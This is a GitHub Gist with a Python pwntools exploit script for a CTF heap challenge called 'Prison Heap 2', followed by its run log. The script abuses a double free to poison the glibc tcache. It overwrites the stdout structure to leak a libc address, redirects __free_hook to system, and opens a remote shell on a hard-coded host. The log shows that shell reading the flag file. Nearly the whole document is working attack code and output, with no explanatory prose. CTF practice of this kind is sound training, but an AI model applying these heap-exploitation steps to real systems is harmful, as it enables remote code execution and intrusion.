Created
April 10, 2020 01:54
-
-
Save KaoRz/143da359af96bde350cdfa0cf23a4b6c to your computer and use it in GitHub Desktop.
Prison Heap 2 - C0r0n4CON Fwhibbit CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# coding: utf-8 | |
from pwn import * | |
context.terminal = ['tmux', 'sp', '-h'] | |
#context.log_level = 'DEBUG' | |
HOST = "104.248.128.57" | |
PORT = 13337 | |
LOCAL = False | |
elf = ELF("./prison_heap_hard") | |
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False) | |
def write_prison(size, data, corrupted = False): | |
io.recvuntil("3. Exit") | |
io.sendline("1") | |
io.recvuntil("heap") | |
io.sendline(str(size)) | |
if not corrupted: | |
io.recvuntil("enter the prison\n") | |
io.sendline(data) | |
else: | |
io.recvuntil("enter the prison") | |
sleep(0.5) | |
io.sendline(data) | |
def free_prison(idx): | |
io.recvuntil("3. Exit") | |
io.sendline("2") | |
io.recvuntil("free") | |
io.sendline(str(idx)) | |
while(True): | |
if LOCAL == True: | |
io = process(elf.path) | |
else: | |
io = remote(HOST, PORT) | |
write_prison(0x10, "") # 0 | |
write_prison(0x100, "") # 1 | |
write_prison(0x100, "/bin/sh\x00") # 2 (Barrier) | |
for _ in range(8): | |
free_prison(1) | |
free_prison(0) | |
free_prison(0) | |
write_prison(0x10, p8(0x80)) # 3 (Overwrite fd pointer) | |
write_prison(0x10, "") # 4 | |
write_prison(0x10, p16(0x8760)) # 5 (Good luck) | |
write_prison(0x100, "") # 6 | |
try: | |
write_prison(0x100, p64(0xfbad1800) + p64(0x0) * 3 + b"\x00") | |
pre_leak = io.recv(0x8) | |
if pre_leak != b"\x00" * 8: | |
log.failure("FAIL! Retrying...") | |
io.close() | |
continue | |
log.success("HIT! Stdout struct overwritten.") | |
leak = u64(io.recv(8)) | |
log.success("Leaked GLIBC address: " + hex(leak)) | |
break | |
except EOFError as error: | |
log.failure("FAIL! Retrying...") | |
io.close() | |
continue | |
libc.address = leak - 0x3ed8b0 | |
log.info("GLIBC base address: " + hex(libc.address)) | |
log.info("System@@GLIBC address: " + hex(libc.sym["system"])) | |
write_prison(0x30, "", True) | |
free_prison(8) | |
free_prison(8) | |
write_prison(0x30, p64(libc.sym["__free_hook"]), True) | |
write_prison(0x30, "", True) | |
write_prison(0x30, p64(libc.sym["system"]), True) | |
free_prison(2) | |
io.interactive() | |
io.close() | |
''' | |
[*] '/home/kaorz/Desktop/CTFs/coronafw/heap2/prison_heap_hard' | |
Arch: amd64-64-little | |
RELRO: Full RELRO | |
Stack: Canary found | |
NX: NX enabled | |
PIE: PIE enabled | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[+] HIT! Stdout struct overwritten. | |
[+] Leaked GLIBC address: 0x7f58d6c498b0 | |
[*] GLIBC base address: 0x7f58d685c000 | |
[*] System@@GLIBC address: 0x7f58d68ab440 | |
[*] Switching to interactive mode | |
$ cat /home/prison/prison_heap_hard/flag.txt | |
flag{h34p_Pr1s0n_1s_n3C3ss4rY_To_h4ck_Th3_Pl4n3t} | |
''' | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment